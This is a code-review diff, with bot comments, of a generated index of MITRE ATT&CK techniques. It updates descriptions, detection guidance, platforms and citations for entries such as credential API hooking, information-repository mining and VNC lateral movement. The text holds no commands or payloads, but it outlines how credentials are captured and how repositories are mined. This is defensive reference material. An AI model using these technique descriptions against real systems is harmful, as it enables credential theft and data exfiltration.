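Review bot: most of this hunk is key reordering rather than content change: `x_mitre_contributors`, `x_mitre_platforms` and `x_mitre_is_subtechnique` for T1213.003 are deleted in one place and re-added with identical values in another, while the substantive edits are the `modified` date, the description's new `[Unsecured Credentials](https://attack.mitre.org/techniques/T1552)` link and the version bump from `'1.1'` to `'1.2'`. If the generator's key order is not deterministic, sort keys before emitting so future diffs show only substantive edits. Also, `spec_version: '2.1'` is dropped for T1557.002 here (as for every technique in this patch) while `x_mitre_attack_spec_version: 2.1.0` is kept; anything downstream that keyed on `spec_version` should be checked.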
@@ -41552,41 +42149,52 @@ collection:
url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213:
technique:
- modified: '2024-03-01T16:27:47.391Z'
+ modified: '2024-10-28T19:10:16.960Z'
name: Data from Information Repositories
description: "Adversaries may leverage information repositories to mine valuable
information. Information repositories are tools that allow for storage of
information, typically to facilitate collaboration or information sharing
between users, and can store a wide variety of data that may aid adversaries
- in further objectives, or direct access to the target information. Adversaries
- may also abuse external sharing features to share sensitive documents with
- recipients outside of the organization. \n\nThe following is a brief list
- of example information that may hold potential value to an adversary and may
- also be found on an information repository:\n\n* Policies, procedures, and
- standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
- Technical system documentation\n* Testing / development credentials\n* Work
- / project schedules\n* Source code snippets\n* Links to network shares and
- other internal resources\n\nInformation stored in a repository may vary based
- on the specific instance or environment. Specific common information repositories
- include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
- and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
- services such as Code Repositories, IaaS databases, enterprise databases,
- and other storage infrastructure such as SQL Server."
+ in further objectives, such as Credential Access, Lateral Movement, or Defense
+ Evasion, or direct access to the target information. Adversaries may also
+ abuse external sharing features to share sensitive documents with recipients
+ outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on an information repository:\n\n*
+ Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+ System architecture diagrams\n* Technical system documentation\n* Testing
+ / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+ \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+ and other internal resources\n* Contact or other sensitive information about
+ business partners and customers, including personally identifiable information
+ (PII) \n\nInformation stored in a repository may vary based on the specific
+ instance or environment. Specific common information repositories include
+ the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+ and more specialized platforms such as customer relationship management (CRM)
+ databases \n* Collaboration platforms such as SharePoint, Confluence, and
+ code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+ \n\nIn some cases, information repositories have been improperly secured,
+ typically by unintentionally allowing for overly-broad access by all users
+ or even public access to unauthenticated users. This is particularly common
+ with cloud-native or cloud-hosted services, such as AWS Relational Database
+ Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+ Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Regina Elwell
- Praetorian
- Milos Stojadinovic
- Isif Ibrahima, Mandiant
+ - Obsidian Security
+ - Naveen Vijayaraghavan
+ - Nilesh Dherange (Gurucul)
x_mitre_deprecated: false
x_mitre_detection: "As information repositories generally have a considerably
large user base, detection of malicious use can be non-trivial. At minimum,
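Review bot: the rewritten T1213 description introduces three citation keys, `(Citation: Mitiga)`, `(Citation: TrendMicro Exposed Redis 2020)` and `(Citation: Cybernews Reuters Leak 2022)`, so each needs an `external_references` entry with exactly that `source_name`; the two hunks that follow add all three, so the links resolve. The contributor change is also a correctness fix rather than churn: the single string `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)`, which combined two people in one entry, is split into separate entries.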
@@ -41615,10 +42223,9 @@ collection:
- Windows
- macOS
- SaaS
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '3.3'
+ - Office Suite
+ x_mitre_version: '3.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
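Review bot: the platform rename from `Office 365` and `Google Workspace` to `Office Suite` (with the version bump to `'3.4'`) changes the values that any platform-filtered view of this index matches on. If a per-platform index or a test-selection script still filters on the old names, T1213 silently drops out of it, so confirm those consumers were regenerated with the new platform vocabulary in the same change.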
@@ -41631,10 +42238,20 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1213
external_id: T1213
+ - source_name: Mitiga
+ description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+ I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+ Retrieved September 24, 2024.
+ url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
- source_name: Atlassian Confluence Logging
description: Atlassian. (2018, January 9). How to Enable User Access Logging.
Retrieved April 4, 2018.
url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ - source_name: TrendMicro Exposed Redis 2020
+ description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+ Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+ September 25, 2024.
+ url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
- source_name: Microsoft SharePoint Logging
description: Microsoft. (2017, July 19). Configure audit settings for a site
collection. Retrieved April 4, 2018.
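Review bot: the new `Mitiga` reference is dated `(n.d.)` while the other sources added for T1213 carry publication dates; if the upstream citation genuinely has no date that is acceptable, but it is worth a check against the linked post, since the entry does carry a retrieved date (September 24, 2024).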
@@ -41643,11 +42260,14 @@ collection:
description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
8, 2021.
url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+ - source_name: Cybernews Reuters Leak 2022
+ description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+ and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+ url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1602.001:
technique:
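Review bot: stray space before the period in `description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected` on the new Cybernews entry. This text is mirrored from the upstream ATT&CK STIX data, so the fix belongs upstream (or in a normalisation step in the generator) rather than as a hand edit to the generated file, otherwise the next regeneration reintroduces it.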
@@ -41684,7 +42304,7 @@ collection:
description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T01:54:22.812Z'
name: SNMP (MIB Dump)
description: "Adversaries may target the Management Information Base (MIB) to
collect and/or mine valuable information in a network managed using Simple
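Review bot: same timestamp regression as for T1557.002 earlier in this patch: `modified` for T1602.001 goes from `'2021-04-29T14:49:39.188Z'` back to `'2020-10-22T01:54:22.812Z'`. Verify once against the upstream STIX object for T1602.001 that the earlier value is the accurate one before merging.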
@@ -41716,115 +42336,182 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-08-27T21:03:56.385Z'
+ name: 'Input Capture: Credential API Hooking'
+ description: |
+ Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+ * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+ * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+ Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+ Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Metadata'
+ - 'Process: OS API Execution'
type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
created: '2020-02-11T19:01:15.930Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1056.004
url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
- source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
Retrieved December 18, 2017.
url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Hook Overview
description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
description: Stack Exchange - Security. (2012, July 31). What are the methods
to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
- name: 'Input Capture: Credential API Hooking'
- description: |
- Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
- * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
- * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
- * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1056.004
+ atomic_tests: []
+ T1213.005:
+ technique:
+ modified: '2024-10-16T14:22:49.146Z'
+ name: Messaging Applications
+ description: "Adversaries may leverage chat and messaging applications, such
+ as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+ \ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on messaging applications: \n\n*
+ Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+ \n* Source code snippets \n* Links to network shares and other internal resources
+ \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+ about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+ 2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+ messaging applications, adversaries may leverage data from chat messages in
+ order to improve their targeting - for example, by learning more about an
+ environment or evading ongoing incident response efforts.(Citation: Sentinel
+ Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: |-
- Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
- Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
- Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - Obsidian Security
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ - Office Suite
x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- - 'Process: Process Metadata'
- - 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- identifier: T1056.004
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+ created: '2024-08-30T13:50:42.023Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/005
+ external_id: T1213.005
+ - source_name: Sentinel Labs NullBulge 2024
+ description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+ as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+ url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+ - source_name: SC Magazine Ragnar Locker 2021
+ description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+ victims it can read the on-network incident response chat rooms. Retrieved
+ August 30, 2024.
+ url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+ - source_name: Guardian Grand Theft Auto Leak 2022
+ description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+ 19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+ Retrieved August 30, 2024.'
+ url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+ - source_name: Microsoft DEV-0537
+ description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+ organizations for data exfiltration and destruction. Retrieved March 23,
+ 2022.
+ url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
lateral-movement:
T1021.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:20:07.264Z'
name: Remote Services:VNC
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
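Review bot: the removal of `x_mitre_attack_spec_version: 2.1.0` from T1602.001 at the top of this hunk leaves that technique with no attack spec version at all, whereas every other technique touched here keeps the key or bumps it to `3.2.0`; check whether the upstream object for T1602.001 really lacks the field or the generator dropped it along with `spec_version`. Two further points: `x_mitre_permissions_required` (`Administrator`, `SYSTEM`) is removed from T1056.004 and is the only content change behind its version bump from `'1.0'` to `'1.1'` (the description and detection text are identical to the deleted copy), so any consumer that reads that field to gate test execution must cope with its absence; and the new T1213.005 (Messaging Applications) arrives with `x_mitre_detection: ''` and `atomic_tests: []` but without the `identifier:` key that T1056.004 and T1021.005 carry, so confirm the empty string (rather than a missing key) is what detection-aware tooling expects and whether omitting `identifier` is intentional.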
@@ -41835,6 +42522,7 @@ lateral-movement:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
@@ -41844,7 +42532,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -41860,66 +42547,67 @@ lateral-movement:
id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
created: '2020-02-11T18:28:44.950Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1021/005
external_id: T1021.005
- - source_name: The Remote Framebuffer Protocol
- description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
- Framebuffer Protocol. Retrieved September 20, 2021.
- url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: Attacking VNC Servers PentestLab
+ description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+ VNC Servers. Retrieved October 6, 2021.
+ url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- source_name: MacOS VNC software for Remote Desktop
description: Apple Support. (n.d.). Set up a computer running VNC software
for Remote Desktop. Retrieved August 18, 2021.
url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
- - source_name: VNC Authentication
- description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
- September 20, 2021.
- url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
- - source_name: Hijacking VNC
- description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
- Access and Crack). Retrieved September 20, 2021.'
- url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+ - source_name: Havana authentication bug
+ description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+ seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+ url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- source_name: macOS root VNC login without authentication
description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
root account without authentication. Retrieved September 20, 2021.
url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
- - source_name: VNC Vulnerabilities
- description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
- Found in Linux, Windows Solutions. Retrieved September 20, 2021.
- url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
- source_name: Offensive Security VNC Authentication Check
description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
6, 2021.
url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
- - source_name: Attacking VNC Servers PentestLab
- description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
- VNC Servers. Retrieved October 6, 2021.
- url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- - source_name: Havana authentication bug
- description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
- seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
- url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
- description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
- Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
- August 19, 2021.'
- url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
- source_name: Gnome Remote Desktop grd-settings
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
- source_name: Gnome Remote Desktop gschema
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+ - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+ description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+ Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+ August 19, 2021.'
+ url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+ - source_name: VNC Vulnerabilities
+ description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+ Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+ url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+ - source_name: The Remote Framebuffer Protocol
+ description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+ Framebuffer Protocol. Retrieved September 20, 2021.
+ url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: VNC Authentication
+ description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+ September 20, 2021.
+ url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+ - source_name: Hijacking VNC
+ description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+ Access and Crack). Retrieved September 20, 2021.'
+ url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
